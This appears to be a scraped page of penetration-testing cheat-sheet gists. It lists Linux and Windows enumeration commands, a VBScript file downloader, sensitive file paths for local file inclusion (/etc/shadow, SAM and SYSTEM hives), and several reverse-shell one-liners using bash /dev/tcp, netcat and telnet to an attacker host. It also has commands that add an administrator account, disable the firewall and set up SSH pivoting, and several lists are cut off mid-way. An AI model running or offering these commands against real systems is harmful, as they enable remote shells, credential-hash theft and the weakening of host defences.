This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Determine linux distribution and version | |
cat /etc/issue | |
cat /etc/*-release | |
cat /etc/lsb-release | |
cat /etc/redhat-release | |
// Determine kernel version - 32 or 64-bit? | |
cat /proc/version | |
uname -a | |
uname -mrs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo strUrl = WScript.Arguments.Item(0) > wget.vbs | |
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs | |
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs | |
echo Err.Clear >> wget.vbs | |
echo Set http = Nothing >> wget.vbs | |
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/apache/logs/access.log | |
/apache/logs/error.log | |
/bin/php.ini | |
/etc/alias | |
/etc/apache2/apache.conf | |
/etc/apache2/conf/httpd.conf | |
/etc/apache2/httpd.conf | |
/etc/apache/conf/httpd.conf | |
/etc/bash.bashrc | |
/etc/chttp.conf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#bash | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
#bash alt | |
exec /bin/bash 0&0 2>&0 | |
#bash alt 2 | |
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
#bash alt 3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#add a user | |
net user ryan mwcb /add | |
#add user to local administrators | |
net localgroup administrators /add ryan | |
#remove firewall | |
netsh firewall set opmode disable | |
#enabled remote desktop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%SYSTEMDRIVE%\boot.ini | |
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
%SYSTEMROOT%\repair\SAM | |
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
%SYSTEMROOT%\repair\system | |
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
%SYSTEMROOT%\repair\SAM | |
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
%WINDIR%\repair\sam | |
%WINDIR%\repair\system |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Use these if you have a simple command shell through LFI or something similar. | |
/etc/issue (A message or system identification to be printed before the login prompt.) | |
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) | |
/etc/passwd | |
/etc/group | |
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) | |
/etc/shadow | |
/home/[USERNAME]/.bash_history or .profile | |
~/.bash_history or .profile |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#1 | |
nc <attacker_ip> <port> -e /bin/bash | |
#2 | |
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
#3 | |
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 | |
#4 | |
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
#5 | |
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##SOCKS Proxy## | |
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
#Command line: | |
ssh -D 127.0.0.1:1080 10.0.0.1 | |
#~/.ssh/config: | |
Host 10.0.0.1 | |
DynamicForward 127.0.0.1:1080 | |
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
NewerOlder